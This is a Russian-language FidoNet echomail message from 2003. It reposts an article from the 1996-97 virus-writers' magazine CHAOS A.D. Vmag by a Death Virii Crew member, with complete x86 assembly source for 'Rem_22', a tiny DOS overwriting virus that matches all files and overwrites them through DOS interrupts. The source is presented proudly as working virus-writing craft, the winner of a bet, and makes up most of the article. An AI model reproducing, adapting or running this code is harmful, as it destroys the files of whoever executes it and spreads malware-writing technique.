To  : Evgeniy Kozhuhovskiy

Subj:

В общем по итогам голосования модеpатоpом выбpали меня

Привет Evgeniy!

15 Jan 03, 14:31, Evgeniy Kozhuhovskiy >> Kostya Volkov

/*──>> /* Здесь начинается BOOTW.COM /*<──/*
EK> begin 644 BOOTW.COM

эта. по сути товарищи, по сути....

comment {

[Death Virii Crew] Presents
CHAOS A.D. Vmag, Issue 3, Autumn 1996 - Winter 1997

Rem_22

Сей маленький оверврайтер был написан под пагубным влиянием пьяных
споров с известным крекером и хакером SkullC0DEr'ом. Спор был выигран
мной, как достойным представителем своего увлечения - вирмейкерства.
Вот перед вами и есть решение небольшой проблемы, каковая стояла:

{
.model tiny
.code
.startup
start:
pop cx
hel:
xchg ax,bx
db 108h shr 1
db 4eh ; dec si
db 9eh shr 1
db 3ch ;cmp al,xx
db 100h shr 1
db 40h
fmask db '*.*',0
lodsw
cwd
mov dl,al
shl dx,1
int 21h
jmp hel
end

(c) by Reminder [DVC]

http://reminder.h1.ru

---
* Origin: 2B OR (NOT 2B) = FF (2:4631/17)